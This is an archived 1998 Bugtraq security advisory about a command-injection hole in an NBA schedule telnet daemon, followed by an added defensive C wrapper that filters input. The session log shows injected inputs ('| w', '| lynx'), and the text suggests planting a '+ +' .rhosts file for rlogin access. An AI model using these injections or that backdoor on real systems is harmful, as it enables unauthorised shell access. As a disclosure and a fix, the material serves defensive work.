Bugtraq mailing list archives

NBA 4.9 Allows Shell Access


From: hdmoore () USA NET (HD Moore)
Date: Sun, 20 Sep 1998 19:23:06 -0500


Recently browsing the internet I came upon a link to telnet to a host on
port 859, apparently an NBA (National Basketball Association) telnet
daemon for showing game schedules. While I am not sure who wrote it, or
who uses it, it does create a major security hole on the machine it is
running on.  At login, you receive a prompt that looks like <nba>; if you
type anything, then the 'pipe' character "|" followed by a shell command,
that command is executed.  Doing this you could create a .rhosts file
containing the classic "+ +", then giving shell access through rlogin.
It is also possible to start lynx (or some other program), then break
out into a shell from that program. If anyone knows the origin of this
program, or someone who uses it, please alert them to this fact.  Please
no flames concerning how stupid of a bug this is, it is still a bug =)

Below is a cut from a session log:

usage: /usr/local/bin/nba [-vh] [-nNUM] [-HA] [-C] [-E[d|w]] [-U[d|w]]
[TEAM|DIV
 [TEAM|DIV]] [mm/dd...]
 With -v, print version information and exit.
   This is version 4.9 for NBA 95-96.
 With -h, print this help message and exit.
 With no teams or divisions specified, print next NUM days (default=1)
of
   of league schedule from given date(s) (default is today if none
given).
 With one team or division, print next NUM games (default=3) for that
team
   or teams in that division.
 With two teams or divisions, print games where first team (or team
   in first division) plays second team (or team in second division).
 -H or -A: Print only home or away games, for first team or division.
 -C: Print monthly calendar format (specify month or default is
current).
 -E: Use European dates (dd/mm) and weeks (starting on Monday).
 -U: Use U.S. dates (mm/dd) and weeks (starting on Sunday).
 Teams can specified with or without leading -t, from the following
list:
   atl - Atlanta            bos - Boston             cha - Charlotte
   chi - Chicago            cle - Cleveland          dal - Dallas
   den - Denver             det - Detroit            gol - Golden State
   hou - Houston            ind - Indiana            lac - LA Clippers
   lal - LA Lakers          mia - Miami              mil - Milwaukee
   min - Minnesota           nj - New Jersey          ny - New York
   orl - Orlando            phi - Philadelphia       pho - Phoenix
   por - Portland           sac - Sacramento         san - San Antonio
   sea - Seattle            tor - Toronto            uta - Utah
   van - Vancouver          was - Washington
 Divisions can specified with or without a leading -d, from the
following list:
   pac - Pacific            mid - Midwest            ctl - Central
   atc - Atlantic
 The season runs from 11/3 to 4/21.

<nba> -V | w
/usr/local/bin/nba: unknown team or division code: -V
18:00  up 18 days, 14:14,  3 users,  load average: 0.29, 0.96, 0.94
User     tty        from             login@    idle   JCPU   PCPU what
xxxxxx p6         lichen           13:17    3days               -ksh
xxxxxx   p0         zlin             14:25    5days               -tcsh
xxxxxx  p7         petrie           15:13    2days  24:46     14 -csh
<nba> blah | lynx
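
Added example, not part of the original post and not the daemon's own code: a front end for the <nba> prompt that hands the input to /usr/local/bin/nba as an argument vector instead of through a shell, and rejects any character outside the option, team-code and date syntax shown in the usage text. It assumes the behaviour in the log comes from the prompt line being passed to a shell; build_argv and the character allow-list are hypothetical.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NBA_PATH "/usr/local/bin/nba"   /* path from the usage line in the log */
#define MAX_ARGS 16

/* Split one prompt line into argv for NBA_PATH without involving a shell.
 * Only characters used by the documented options, team codes and dates are
 * accepted; anything else (|, ;, &, `, $, <, >, ...) rejects the whole line.
 * Modifies buf in place. Returns argc, or -1 if the line is rejected. */
int build_argv(char *buf, char *argv[], int max)
{
    int argc = 0;
    size_t i, n = strlen(buf);

    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)buf[i];
        if (!(isalnum(c) || c == '-' || c == '/' || c == ' ' || c == '\t'))
            return -1;
    }
    argv[argc++] = (char *)"nba";
    for (char *tok = strtok(buf, " \t"); tok; tok = strtok(NULL, " \t")) {
        if (argc >= max - 1)
            return -1;                  /* no room left for the NULL terminator */
        argv[argc++] = tok;
    }
    argv[argc] = NULL;
    return argc;
}

int main(void)
{
    char line[256], *argv[MAX_ARGS];

    fputs("<nba> ", stdout);
    fflush(stdout);
    if (!fgets(line, sizeof line, stdin))
        return 1;
    line[strcspn(line, "\r\n")] = '\0';     /* telnet clients send CR LF */
    if (build_argv(line, argv, MAX_ARGS) < 0) {
        fputs("invalid input\n", stderr);
        return 1;
    }
    execv(NBA_PATH, argv);  /* arguments go straight to the program, no /bin/sh */
    perror("execv");
    return 1;
}
```

Because the program path is fixed and no shell parses the line, neither the pipe nor a request to start another program such as lynx reaches anything but nba's own argument parser.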


